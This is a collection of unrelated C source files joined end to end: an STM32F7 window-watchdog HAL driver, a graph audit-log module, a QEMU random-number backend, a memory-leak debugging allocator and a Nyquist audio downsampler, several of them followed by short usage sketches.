refresh is allowed between the following limits : (++) min time (ms) = (1000 * (T[5;0] - Window)) / (WWDG downcounter clock) (++) max time (ms) = (1000 * (T[5;0] - 0x40)) / (WWDG downcounter clock) (+) Min-max timeout value @80 MHz(PCLK1): ~51.2 us / ~26.22 ms (+) The Early Wakeup Interrupt (EWI) can be used if specific safety operations or data logging must be performed before the actual reset is generated. When the downcounter reaches the value 0x40, an EWI interrupt is generated and the corresponding interrupt service routine (ISR) can be used to trigger specific actions (such as communications or data logging), before resetting the device. In some applications, the EWI interrupt can be used to manage a software system check and/or system recovery/graceful degradation, without generating a WWDG reset. In this case, the corresponding interrupt service routine (ISR) should reload the WWDG counter to avoid the WWDG reset, then trigger the required actions. Note: When the EWI interrupt cannot be served, e.g. due to a system lock in a higher priority task, the WWDG reset will eventually be generated. (+) Debug mode : When the microcontroller enters debug mode (core halted), the WWDG counter either continues to work normally or stops, depending on DBG_WWDG_STOP configuration bit in DBG module, accessible through __HAL_DBGMCU_FREEZE_WWDG() and __HAL_DBGMCU_UNFREEZE_WWDG() macros ##### How to use this driver ##### ============================================================================== [..] (+) Enable WWDG APB1 clock using __HAL_RCC_WWDG_CLK_ENABLE(). (+) Set the WWDG prescaler, refresh window, counter value and Early Wakeup Interrupt mode using HAL_WWDG_Init() function. This enables WWDG peripheral and the downcounter starts downcounting from given counter value. Init function can be called again to modify all watchdog parameters, however if EWI mode has been set once, it can't be cleared until the next reset.
(+) The application program must refresh the WWDG counter at regular intervals during normal operation to prevent an MCU reset using HAL_WWDG_Refresh() function. This operation must occur only when the counter is lower than the window value already programmed. (+) If Early Wakeup Interrupt mode is enabled, an interrupt is generated when the counter reaches 0x40. Users can add their own code in the weak function HAL_WWDG_EarlyWakeupCallback(). *** WWDG HAL driver macros list *** ================================== [..] Below the list of most used macros in WWDG HAL driver. (+) __HAL_WWDG_GET_IT_SOURCE: Check the selected WWDG's interrupt source. (+) __HAL_WWDG_GET_FLAG: Get the selected WWDG's flag status. (+) __HAL_WWDG_CLEAR_FLAG: Clear the WWDG's pending flags. @endverbatim ****************************************************************************** * @attention * * <h2><center>&copy; COPYRIGHT(c) 2016 STMicroelectronics</center></h2> * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * 3. Neither the name of STMicroelectronics nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * ****************************************************************************** */ /* Includes ------------------------------------------------------------------*/ #include "stm32f7xx_hal.h" /** @addtogroup STM32F7xx_HAL_Driver * @{ */ #ifdef HAL_WWDG_MODULE_ENABLED /** @defgroup WWDG WWDG * @brief WWDG HAL module driver. * @{ */ /* Private typedef -----------------------------------------------------------*/ /* Private define ------------------------------------------------------------*/ /* Private macro -------------------------------------------------------------*/ /* Private variables ---------------------------------------------------------*/ /* Private function prototypes -----------------------------------------------*/ /* Exported functions --------------------------------------------------------*/ /** @defgroup WWDG_Exported_Functions WWDG Exported Functions * @{ */ /** @defgroup WWDG_Exported_Functions_Group1 Initialization and Configuration functions * @brief Initialization and Configuration functions.
* @verbatim ============================================================================== ##### Initialization and Configuration functions ##### ============================================================================== [..] This section provides functions allowing to: (+) Initialize and start the WWDG according to the specified parameters in the WWDG_InitTypeDef of associated handle. (+) Initialize the WWDG MSP. @endverbatim * @{ */ /** * @brief Initialize the WWDG according to the specified * parameters in the WWDG_InitTypeDef of the associated handle. * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains * the configuration information for the specified WWDG module. * @retval HAL status */ HAL_StatusTypeDef HAL_WWDG_Init(WWDG_HandleTypeDef *hwwdg) { /* Check the WWDG handle allocation */ if(hwwdg == NULL) { return HAL_ERROR; } /* Check the parameters */ assert_param(IS_WWDG_ALL_INSTANCE(hwwdg->Instance)); assert_param(IS_WWDG_PRESCALER(hwwdg->Init.Prescaler)); assert_param(IS_WWDG_WINDOW(hwwdg->Init.Window)); assert_param(IS_WWDG_COUNTER(hwwdg->Init.Counter)); assert_param(IS_WWDG_EWI_MODE(hwwdg->Init.EWIMode)); /* Init the low level hardware */ HAL_WWDG_MspInit(hwwdg); /* Set WWDG Counter */ WRITE_REG(hwwdg->Instance->CR, (WWDG_CR_WDGA | hwwdg->Init.Counter)); /* Set WWDG Prescaler and Window */ WRITE_REG(hwwdg->Instance->CFR, (hwwdg->Init.EWIMode | hwwdg->Init.Prescaler | hwwdg->Init.Window)); /* Return function status */ return HAL_OK; } /** * @brief Initialize the WWDG MSP. * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains * the configuration information for the specified WWDG module. * @note When rewriting this function in a user file, a mechanism may be added * to avoid multiple initializations when HAL_WWDG_Init is called * again to change parameters. * @retval None */ __weak void HAL_WWDG_MspInit(WWDG_HandleTypeDef *hwwdg) { /* Prevent unused argument(s) compilation warning */ UNUSED(hwwdg); /* NOTE: This function should not be modified, when the callback is needed, the HAL_WWDG_MspInit could be implemented in the user file */ } /** * @} */ /** @defgroup WWDG_Exported_Functions_Group2 IO operation functions * @brief IO operation functions * @verbatim ============================================================================== ##### IO operation functions ##### ============================================================================== [..] This section provides functions allowing to: (+) Refresh the WWDG. (+) Handle WWDG interrupt request and associated function callback. @endverbatim * @{ */ /** * @brief Refresh the WWDG. * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains * the configuration information for the specified WWDG module. * @retval HAL status */ HAL_StatusTypeDef HAL_WWDG_Refresh(WWDG_HandleTypeDef *hwwdg) { /* Write to WWDG CR the WWDG Counter value to refresh with */ WRITE_REG(hwwdg->Instance->CR, (hwwdg->Init.Counter)); /* Return function status */ return HAL_OK; } /** * @brief Handle WWDG interrupt request. * @note The Early Wakeup Interrupt (EWI) can be used if specific safety operations * or data logging must be performed before the actual reset is generated. * The EWI interrupt is enabled by calling HAL_WWDG_Init function with * EWIMode set to WWDG_EWI_ENABLE.
* When the downcounter reaches the value 0x40, an EWI interrupt is * generated and the corresponding Interrupt Service Routine (ISR) can * be used to trigger specific actions (such as communications or data * logging), before resetting the device. * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains * the configuration information for the specified WWDG module. * @retval None */ void HAL_WWDG_IRQHandler(WWDG_HandleTypeDef *hwwdg) { /* Check if Early Wakeup Interrupt is enabled */ if(__HAL_WWDG_GET_IT_SOURCE(hwwdg, WWDG_IT_EWI) != RESET) { /* Check if WWDG Early Wakeup Interrupt occurred */ if(__HAL_WWDG_GET_FLAG(hwwdg, WWDG_FLAG_EWIF) != RESET) { /* Clear the WWDG Early Wakeup flag */ __HAL_WWDG_CLEAR_FLAG(hwwdg, WWDG_FLAG_EWIF); /* Early Wakeup callback */ HAL_WWDG_EarlyWakeupCallback(hwwdg); } } } /** * @brief WWDG Early Wakeup callback. * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains * the configuration information for the specified WWDG module. * @retval None */ __weak void HAL_WWDG_EarlyWakeupCallback(WWDG_HandleTypeDef* hwwdg) { /* Prevent unused argument(s) compilation warning */ UNUSED(hwwdg); /* NOTE: This function should not be modified, when the callback is needed, the HAL_WWDG_EarlyWakeupCallback could be implemented in the user file */ } /** * @} */ /** * @} */ #endif /* HAL_WWDG_MODULE_ENABLED */ /** * @} */ /** * @} */ /************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
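/* Worked example -- an editor's sketch, not part of the HAL. It evaluates the timeout formulas quoted in the driver header above for an assumed PCLK1 of 50 MHz, a prescaler of 8 and a full reload value of 0x7F; all figures are illustrative. */
#include <stdio.h>

int main(void)
{
    double pclk1 = 50000000.0;          /* assumed APB1 clock in Hz */
    double prescaler = 8.0;             /* e.g. WWDG_PRESCALER_8 */
    unsigned counter = 0x7F;            /* reload value; bit 6 must stay set */

    /* WWDG downcounter clock (Hz) = PCLK1 / (4096 * Prescaler) */
    double wwdg_clk = pclk1 / (4096.0 * prescaler);

    /* WWDG timeout (ms) = (1000 * (T[5;0] + 1)) / (WWDG downcounter clock) */
    double timeout_ms = 1000.0 * ((counter & 0x3FU) + 1) / wwdg_clk;

    printf("downcounter clock: %.2f Hz, timeout: %.2f ms\n",
           wwdg_clk, timeout_ms);       /* ~1525.88 Hz, ~41.94 ms */
    return 0;
}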
724070.c
/** * Little module to attach an audit trail to a graph_t struct. * * Author: Paul McCarthy <pauld.mccarthy@gmail.com> */ #include <string.h> #include <stdint.h> #include <stdlib.h> #include "util/array.h" #include "graph/graph.h" #include "graph/graph_log.h" /** * Frees the memory used by the given trail. */ static void _log_free( void *log /**< pointer to an array_t struct containing messages */ ); uint8_t graph_log_init(graph_t *g) { array_t *log; log = calloc(1, sizeof(array_t)); if (log == NULL) goto fail; if (array_create(log, sizeof(char *), 10)) goto fail; g->ctx[_GRAPH_LOG_CTX_LOC_] = log; g->ctx_free[_GRAPH_LOG_CTX_LOC_] = _log_free; return 0; fail: if (log != NULL) free(log); return 1; } void _log_free(void *vlog) { array_t *log; char *msg; uint64_t i; log = vlog; for (i = 0; i < log->size; i++) { msg = *(char **)array_getd(log, i); if (msg != NULL) free(msg); } array_free(log); } uint8_t graph_log_exists(graph_t *g) { return g->ctx[_GRAPH_LOG_CTX_LOC_] != NULL ? 1 : 0; } uint16_t graph_log_num_msgs(graph_t *g) { array_t *log; log = g->ctx[_GRAPH_LOG_CTX_LOC_]; if (log == NULL) return 0; return log->size; } char * graph_log_get_msg(graph_t *g, uint16_t i) { array_t *log; log = g->ctx[_GRAPH_LOG_CTX_LOC_]; if (log == NULL) return NULL; if (i >= log->size) return NULL; return *(char **)array_getd(log, i); } uint8_t graph_log_add(graph_t *g, char *msg) { array_t *log; char *msgcpy; uint32_t len; msgcpy = NULL; len = strlen(msg); log = g->ctx[_GRAPH_LOG_CTX_LOC_]; if (log == NULL) return 0; msgcpy = malloc(len+1); if (msgcpy == NULL) goto fail; strcpy(msgcpy, msg); if (array_append(log, &msgcpy)) goto fail; return 0; fail: if (msgcpy != NULL) free(msgcpy); return 1; } uint8_t graph_log_copy(graph_t *gin, graph_t *gout) { uint32_t i; uint16_t nmsgs; char *msg; if (gin == NULL) goto fail; if (gout == NULL) goto fail; if (!graph_log_exists(gout)) { if (graph_log_init(gout)) goto fail; } if (!graph_log_exists(gin)) return 0; nmsgs = graph_log_num_msgs(gin); for (i = 0; i < nmsgs; i++) { msg = graph_log_get_msg(gin, i); if (msg == NULL) continue; if (graph_log_add(gout, msg)) goto fail; } return 0; fail: return 1; } uint16_t graph_log_total_len(graph_t *g) { uint64_t i; uint16_t len; array_t *log; char *msg; len = 0; log = g->ctx[_GRAPH_LOG_CTX_LOC_]; if (log == NULL) return 0; for (i = 0; i < log->size; i++) { msg = *(char **)array_getd(log, i); len += strlen(msg); } return len; } uint8_t graph_log_import(graph_t *g, char *data, char *delim) { int32_t len; uint16_t dlen; array_t *log; char *msg; char *substr; uint16_t substrlen; msg = NULL; log = g->ctx[_GRAPH_LOG_CTX_LOC_]; len = strlen(data); dlen = strlen(delim); if (log == NULL) return 0; while (len > 0) { substr = strstr(data, delim); if (substr == NULL) substrlen = len; else substrlen = substr - data; if (substrlen > 0) { msg = calloc(substrlen+1, 1); if (msg == NULL) goto fail; memcpy(msg, data, substrlen); msg[substrlen] = '\0'; if (array_append(log, &msg)) goto fail; } data += (substrlen + dlen); len -= (substrlen + dlen); } return 0; fail: return 1; } void graph_log_export(graph_t *g, char *dest, char *delim) { uint32_t i; array_t *log; uint16_t dlen; uint16_t len; char *msg; dlen = strlen(delim); log = g->ctx[_GRAPH_LOG_CTX_LOC_]; if (log == NULL) return; for (i = 0; i < log->size; i++) { msg = *(char **)array_getd(log, i); len = strlen(msg); memcpy(dest, msg, len); dest += len; if (i < log->size - 1) { memcpy(dest, delim, dlen); dest += dlen; } } dest[0] = '\0'; }
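/* Usage sketch -- an editor's illustration, not part of graph_log.c. It assumes a graph_t already constructed elsewhere through the graph.h API; log_example() and the message text are illustrative. */
#include <stdio.h>
#include "graph/graph.h"
#include "graph/graph_log.h"

static void log_example(graph_t *g)
{
  /* attach a log on first use, then append and read back a message */
  if (!graph_log_exists(g) && graph_log_init(g) != 0) return;
  if (graph_log_add(g, "thresholded at 0.9") != 0) return;
  printf("%u message(s), first: %s\n",
         (unsigned)graph_log_num_msgs(g), graph_log_get_msg(g, 0));
}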
703736.c
/* * QEMU Random Number Generator Backend * * Copyright IBM, Corp. 2012 * * Authors: * Anthony Liguori <aliguori@us.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "sysemu/rng.h" #include "qapi/qmp/qerror.h" #include "qom/object_interfaces.h" void rng_backend_request_entropy(RngBackend *s, size_t size, EntropyReceiveFunc *receive_entropy, void *opaque) { RngBackendClass *k = RNG_BACKEND_GET_CLASS(s); if (k->request_entropy) { k->request_entropy(s, size, receive_entropy, opaque); } } void rng_backend_cancel_requests(RngBackend *s) { RngBackendClass *k = RNG_BACKEND_GET_CLASS(s); if (k->cancel_requests) { k->cancel_requests(s); } } static bool rng_backend_prop_get_opened(Object *obj, Error **errp) { RngBackend *s = RNG_BACKEND(obj); return s->opened; } static void rng_backend_complete(UserCreatable *uc, Error **errp) { object_property_set_bool(OBJECT(uc), true, "opened", errp); } static void rng_backend_prop_set_opened(Object *obj, bool value, Error **errp) { RngBackend *s = RNG_BACKEND(obj); RngBackendClass *k = RNG_BACKEND_GET_CLASS(s); Error *local_err = NULL; if (value == s->opened) { return; } if (!value && s->opened) { error_setg(errp, QERR_PERMISSION_DENIED); return; } if (k->opened) { k->opened(s, &local_err); if (local_err) { error_propagate(errp, local_err); return; } } s->opened = true; } static void rng_backend_init(Object *obj) { object_property_add_bool(obj, "opened", rng_backend_prop_get_opened, rng_backend_prop_set_opened, NULL); } static void rng_backend_class_init(ObjectClass *oc, void *data) { UserCreatableClass *ucc = USER_CREATABLE_CLASS(oc); ucc->complete = rng_backend_complete; } static const TypeInfo rng_backend_info = { .name = TYPE_RNG_BACKEND, .parent = TYPE_OBJECT, .instance_size = sizeof(RngBackend), .instance_init = rng_backend_init, .class_size = sizeof(RngBackendClass), .class_init = rng_backend_class_init, .abstract = true, .interfaces = (InterfaceInfo[]) { { TYPE_USER_CREATABLE }, { } } }; static void register_types(void) { type_register_static(&rng_backend_info); } type_init(register_types);
34514.c
#include "debug.h" #include <stdlib.h> #include <stdio.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #ifndef MDEBUG ALLOC void* xmalloc(size_t size) { void* buf = malloc(size); if(buf == NULL) { fprintf(stderr, "It is not enough memory"); exit(1); } return buf; } ALLOC char* xstrdup(char* str) { char* buf = strdup(str); if(buf == NULL) { fprintf(stderr, "It is not enough memory\n"); exit(1); } return buf; } ALLOC void* xrealloc(void* ptr, size_t size) { char* buf = realloc(ptr, size); if(buf == NULL) { fprintf(stderr, "It is not enough memory\n"); exit(1); } return buf; } #else static char* xstrncpy(char* des, char* src, int size) { des[size-1] = 0; return strncpy(des, src, size-1); } static char* xstrncat(char* des, char* str, int size) { des[size-1] = 0; return strncat(des, str, size-1); } ////////////////////////////////////////////////////////////////////// // for memory leak checking ////////////////////////////////////////////////////////////////////// #define NAME_SIZE 128 typedef struct _t_malloc_entry { void* mMemory; char mFileName[NAME_SIZE]; int mLine; char mFuncName[NAME_SIZE]; struct _t_malloc_entry* mNextEntry; } t_malloc_entry; #define ARRAY_SIZE 65535 static t_malloc_entry* gMallocEntries[ARRAY_SIZE]; void release_entry(void* memory, const char* file_name, int line, const char* func_name) { t_malloc_entry* entry; #ifdef __64bit__ unsigned long long hash = ((unsigned long long)memory) % ARRAY_SIZE; #else unsigned long hash = ((unsigned long )memory) % ARRAY_SIZE; #endif entry = gMallocEntries[hash]; if(entry->mMemory == memory) { t_malloc_entry* next_entry = entry->mNextEntry; free(entry); gMallocEntries[hash] = next_entry; return ; } else { while(entry->mNextEntry) { if(entry->mNextEntry->mMemory == memory) { t_malloc_entry* next_entry = entry->mNextEntry->mNextEntry; free(entry->mNextEntry); entry->mNextEntry = next_entry; return; } entry = entry->mNextEntry; } } #ifdef __64bit__ fprintf(stderr, "\tinvalid free at file: %s line:%d function:%s() addr:%llx\n", entry->mFileName, entry->mLine, entry->mFuncName, (unsigned long long)entry->mMemory); #else fprintf(stderr, "\tinvalid free at file: %s line:%d function:%s() addr:%lx\n", entry->mFileName, entry->mLine, entry->mFuncName, (unsigned long)entry->mMemory); #endif } ////////////////////////////////////////////////////////////////////// // memory leak checking starts ////////////////////////////////////////////////////////////////////// void debug_init() { memset(gMallocEntries, 0, sizeof(t_malloc_entry*)*ARRAY_SIZE); } ////////////////////////////////////////////////////////////////////// // memory leak checking finish ////////////////////////////////////////////////////////////////////// void debug_final() { int i; fprintf(stderr, "Detecting memory leak...\n"); for(i=0; i<ARRAY_SIZE; i++) { t_malloc_entry* entry = gMallocEntries[i]; while(entry) { #ifdef __64bit__ fprintf(stderr, "\tDetected!! at file: %s line:%d function:%s() addr:%llx\n" , entry->mFileName, entry->mLine , entry->mFuncName, (unsigned long long)entry->mMemory); #else fprintf(stderr, "\tDetected!! 
at file: %s line:%d function:%s() addr:%lx\n" , entry->mFileName, entry->mLine , entry->mFuncName, (unsigned long)entry->mMemory); #endif entry = entry->mNextEntry; } } fprintf(stderr, "done.\n"); } ////////////////////////////////////////////////////////////////////// // malloc for memory leak checking ////////////////////////////////////////////////////////////////////// ALLOC void* debug_malloc(size_t size, const char* file_name, int line, const char* func_name) { t_malloc_entry* entry; int i; int hash; entry = (t_malloc_entry*)malloc(sizeof(t_malloc_entry)); xstrncpy(entry->mFileName, (char*)file_name, NAME_SIZE); entry->mLine = line; xstrncpy(entry->mFuncName, (char*)func_name, NAME_SIZE); entry->mMemory = malloc(size); #ifdef __64bit__ hash = (unsigned long long)entry->mMemory % ARRAY_SIZE; #else hash = (unsigned long)entry->mMemory % ARRAY_SIZE; #endif entry->mNextEntry = gMallocEntries[hash]; gMallocEntries[hash] = entry; return entry->mMemory; } ////////////////////////////////////////////////////////////////////// // realloc for memory leak checking ////////////////////////////////////////////////////////////////////// ALLOC void* debug_realloc(void* memory, size_t size, const char* file_name, int line, const char* func_name) { t_malloc_entry* entry; int hash; /// delete old entry /// if(memory) release_entry(memory, file_name, line, func_name); /// add new entry /// entry = (t_malloc_entry*)malloc(sizeof(t_malloc_entry)); xstrncpy(entry->mFileName, (char*)file_name, NAME_SIZE); entry->mLine = line; xstrncpy(entry->mFuncName, (char*)func_name, NAME_SIZE); entry->mMemory = realloc(memory, size); if(entry->mMemory == NULL) { fprintf(stderr,"false in allocating memory."); exit(1); } #ifdef __64bit__ hash = (unsigned long long)entry->mMemory % ARRAY_SIZE; #else hash = (unsigned long)entry->mMemory % ARRAY_SIZE; #endif entry->mNextEntry = gMallocEntries[hash]; gMallocEntries[hash] = entry; return entry->mMemory; } ////////////////////////////////////////////////////////////////////// // strdup for memory leak checking ////////////////////////////////////////////////////////////////////// ALLOC char* debug_strdup(char* str, const char* file_name, int line, const char* func_name) { char* result; result = (char*)debug_malloc(sizeof(char)*(strlen(str)+1), file_name, line, func_name); xstrncpy(result, str, strlen(str)+1); return result; } ////////////////////////////////////////////////////////////////////// // free for memory leak chekcing ////////////////////////////////////////////////////////////////////// void debug_free(void* memory, const char* file_name, int line, const char* func_name) { release_entry(memory, file_name, line, func_name); free(memory); } #endif
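/*
 * Illustration only: debug.h is not shown here, but a typical way to route
 * every allocation through the checker above is a set of macros like the
 * following (the exact names in debug.h are an assumption). With MDEBUG
 * defined, each call records __FILE__/__LINE__/__func__, and debug_final()
 * prints whatever was never freed.
 */
#ifdef MDEBUG
#define xmalloc(size)       debug_malloc(size, __FILE__, __LINE__, __func__)
#define xrealloc(ptr, size) debug_realloc(ptr, size, __FILE__, __LINE__, __func__)
#define xstrdup(str)        debug_strdup(str, __FILE__, __LINE__, __func__)
#define xfree(ptr)          debug_free(ptr, __FILE__, __LINE__, __func__)
#endif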
543564.c
/* downsample.c -- linear interpolation to a lower sample rate */ /* CHANGE LOG * -------------------------------------------------------------------- * 28Apr03 dm changes for portability and fix compiler warnings */ #include "stdio.h" #ifndef mips #include "stdlib.h" #endif #include "xlisp.h" #include "sound.h" #include "falloc.h" #include "cext.h" #include "downsample.h" void down_free(snd_susp_type a_susp); typedef struct down_susp_struct { snd_susp_node susp; boolean started; long terminate_cnt; boolean logically_stopped; sound_type s; long s_cnt; sample_block_values_type s_ptr; /* support for interpolation of s */ sample_type s_x1_sample; double s_pHaSe; double s_pHaSe_iNcR; /* support for ramp between samples of s */ double output_per_s; long s_n; } down_susp_node, *down_susp_type; void down_i_fetch(snd_susp_type a_susp, snd_list_type snd_list) { down_susp_type susp = (down_susp_type) a_susp; int cnt = 0; /* how many samples computed */ sample_type s_x2_sample; int togo; int n; sample_block_type out; register sample_block_values_type out_ptr; register sample_block_values_type out_ptr_reg; register double s_pHaSe_iNcR_rEg = susp->s_pHaSe_iNcR; register double s_pHaSe_ReG; register sample_type s_x1_sample_reg; falloc_sample_block(out, "down_i_fetch"); out_ptr = out->samples; snd_list->block = out; /* make sure sounds are primed with first values */ if (!susp->started) { susp->started = true; susp_check_term_log_samples(s, s_ptr, s_cnt); susp->s_x1_sample = susp_fetch_sample(s, s_ptr, s_cnt); } susp_check_term_log_samples(s, s_ptr, s_cnt); s_x2_sample = susp_current_sample(s, s_ptr); /* initially, s_x1_sample and s_x2_samples will be the first 2 samples * and phase will be zero, so interpolation between these two will yield * s_x1_sample. */ while (cnt < max_sample_block_len) { /* outer loop */ /* first compute how many samples to generate in inner loop: */ /* don't overflow the output sample block: */ togo = max_sample_block_len - cnt; /* don't run past terminate time */ if (susp->terminate_cnt != UNKNOWN && susp->terminate_cnt <= susp->susp.current + cnt + togo) { togo = susp->terminate_cnt - (susp->susp.current + cnt); if (togo <= 0) { togo = 0; break; } } /* don't run past logical stop time */ if (!susp->logically_stopped && susp->susp.log_stop_cnt != UNKNOWN) { int to_stop = susp->susp.log_stop_cnt - (susp->susp.current + cnt); /* break if to_stop == 0 (we're at the logical stop) * AND cnt > 0 (we're not at the beginning of the * output block). 
*/ if (to_stop < togo) { if (to_stop == 0) { if (cnt) { togo = 0; break; } else /* keep togo as is: since cnt == 0, we * can set the logical stop flag on this * output block */ susp->logically_stopped = true; } else /* limit togo so we can start a new * block at the LST */ togo = to_stop; } } n = togo; s_pHaSe_ReG = susp->s_pHaSe; s_x1_sample_reg = susp->s_x1_sample; out_ptr_reg = out_ptr; if (n) do { while (s_pHaSe_ReG >= 1.0) { if (s_pHaSe_ReG < 2) { /* quick, just take one sample */ s_x1_sample_reg = s_x2_sample; /* pick up next sample as s_x2_sample: */ susp->s_ptr++; susp_took(s_cnt, 1); s_pHaSe_ReG -= 1.0; } else { /* jump over as much input as possible */ int take = (int) s_pHaSe_ReG; /* rounds down */ take--; /* leave s_pHaSe_ReG > 1 so we stay in loop */ /* next iteration will set s_x1_sample_reg */ if (take > susp->s_cnt) take = susp->s_cnt; susp->s_ptr += take; susp_took(s_cnt, take); s_pHaSe_ReG -= take; } /* derived from susp_check_term_log_samples_break, but with a goto instead of a break */ if (susp->s_cnt == 0) { susp_get_samples(s, s_ptr, s_cnt); terminate_test(s_ptr, s, susp->s_cnt); /* see if newly discovered logical stop time: */ logical_stop_test(s, susp->s_cnt); if ((susp->terminate_cnt != UNKNOWN && susp->terminate_cnt < susp->susp.current + cnt + togo) || (!susp->logically_stopped && susp->susp.log_stop_cnt != UNKNOWN && susp->susp.log_stop_cnt < susp->susp.current + cnt + togo)) { /* Because we are down sampling, we could have just computed an output at sample N and be working on sample N+1, but then the next input sample is logically stopped. Bad because we cannot back up and undo sample N to put it in the next block with a logical stop flag set. Our only choice is to "fix" the logical stop time to be on the next sample. */ if (susp->terminate_cnt != UNKNOWN && susp->terminate_cnt < susp->susp.current + togo - n) { susp->terminate_cnt = susp->susp.current + togo - n; } if (susp->susp.log_stop_cnt != UNKNOWN && susp->susp.log_stop_cnt < susp->susp.current + togo - n) { susp->susp.log_stop_cnt = susp->susp.current + togo - n; } goto breakout; } } s_x2_sample = susp_current_sample(s, s_ptr); } *out_ptr_reg++ = (sample_type) (s_x1_sample_reg * (1 - s_pHaSe_ReG) + s_x2_sample * s_pHaSe_ReG); s_pHaSe_ReG += s_pHaSe_iNcR_rEg; } while (--n); /* inner loop */ breakout: togo -= n; susp->s_pHaSe = s_pHaSe_ReG; susp->s_x1_sample = s_x1_sample_reg; out_ptr += togo; cnt += togo; } /* outer loop */ /* test for termination */ if (togo == 0 && cnt == 0) { snd_list_terminate(snd_list); } else { snd_list->block_len = cnt; susp->susp.current += cnt; } /* test for logical stop */ if (susp->logically_stopped) { snd_list->logically_stopped = true; } else if (susp->susp.log_stop_cnt == susp->susp.current) { susp->logically_stopped = true; } } /* down_i_fetch */ void down_toss_fetch(snd_susp_type a_susp, snd_list_type snd_list) { down_susp_type susp = (down_susp_type) a_susp; long final_count = MIN(susp->susp.current + max_sample_block_len, susp->susp.toss_cnt); time_type final_time = susp->susp.t0 + final_count / susp->susp.sr; long n; /* fetch samples from s up to final_time for this block of zeros */ while (((long) ((final_time - susp->s->t0) * susp->s->sr + 0.5)) >= susp->s->current) susp_get_samples(s, s_ptr, s_cnt); /* convert to normal processing when we hit final_count */ /* we want each signal positioned at final_time */ if (final_count == susp->susp.toss_cnt) { n = ROUNDBIG((final_time - susp->s->t0) * susp->s->sr - (susp->s->current - susp->s_cnt)); susp->s_ptr += n; 
susp_took(s_cnt, n); susp->susp.fetch = susp->susp.keep_fetch; } snd_list->block_len = (short) (final_count - susp->susp.current); susp->susp.current = final_count; snd_list->u.next = snd_list_create((snd_susp_type) susp); snd_list->block = internal_zero_block; } void down_mark(snd_susp_type a_susp) { down_susp_type susp = (down_susp_type) a_susp; sound_xlmark(susp->s); } void down_free(snd_susp_type a_susp) { down_susp_type susp = (down_susp_type) a_susp; sound_unref(susp->s); ffree_generic(susp, sizeof(down_susp_node), "down_free"); } void down_print_tree(snd_susp_type a_susp, int n) { down_susp_type susp = (down_susp_type) a_susp; indent(n); stdputstr("s:"); sound_print_tree_1(susp->s, n); } sound_type snd_make_down(rate_type sr, sound_type s) { register down_susp_type susp; /* sr specified as input parameter */ time_type t0 = s->t0; sample_type scale_factor = 1.0F; time_type t0_min = t0; if (s->sr < sr) { sound_unref(s); xlfail("snd-down: output sample rate must be lower than input"); } falloc_generic(susp, down_susp_node, "snd_make_down"); susp->susp.fetch = down_i_fetch; susp->terminate_cnt = UNKNOWN; /* handle unequal start times, if any */ if (t0 < s->t0) sound_prepend_zeros(s, t0); /* minimum start time over all inputs: */ t0_min = min(s->t0, t0); /* how many samples to toss before t0: */ susp->susp.toss_cnt = (long) ((t0 - t0_min) * sr + 0.5); if (susp->susp.toss_cnt > 0) { susp->susp.keep_fetch = susp->susp.fetch; susp->susp.fetch = down_toss_fetch; } /* initialize susp state */ susp->susp.free = down_free; susp->susp.sr = sr; susp->susp.t0 = t0; susp->susp.mark = down_mark; susp->susp.print_tree = down_print_tree; susp->susp.name = "down"; susp->logically_stopped = false; susp->susp.log_stop_cnt = logical_stop_cnt_cvt(s); susp->started = false; susp->susp.current = 0; susp->s = s; susp->s_cnt = 0; susp->s_pHaSe = 0.0; susp->s_pHaSe_iNcR = s->sr / sr; susp->s_n = 0; susp->output_per_s = sr / s->sr; return sound_create((snd_susp_type)susp, t0, sr, scale_factor); } sound_type snd_down(rate_type sr, sound_type s) { sound_type s_copy = sound_copy(s); return snd_make_down(sr, s_copy); }
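/*
 * The fetch loop above is heavily macro-ized Nyquist suspension code.
 * Stripped of that machinery, the core resampling step is plain linear
 * interpolation with a phase accumulator. A standalone sketch (not part
 * of the original file):
 */
static long downsample_block(const float *in, long n_in,
                             float *out, long max_out,
                             double in_sr, double out_sr)
{
    double incr = in_sr / out_sr;   /* input samples per output sample (> 1) */
    double phase = 0.0;             /* position between in[i] and in[i+1] */
    long i = 0, produced = 0;

    while (i + 1 < n_in && produced < max_out) {
        /* interpolate between the two input samples straddling the phase */
        out[produced++] = (float)(in[i] * (1.0 - phase) + in[i + 1] * phase);
        phase += incr;
        while (phase >= 1.0 && i + 1 < n_in) {  /* consume whole input steps */
            phase -= 1.0;
            i++;
        }
    }
    return produced;  /* number of output samples written */
}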
564222.c
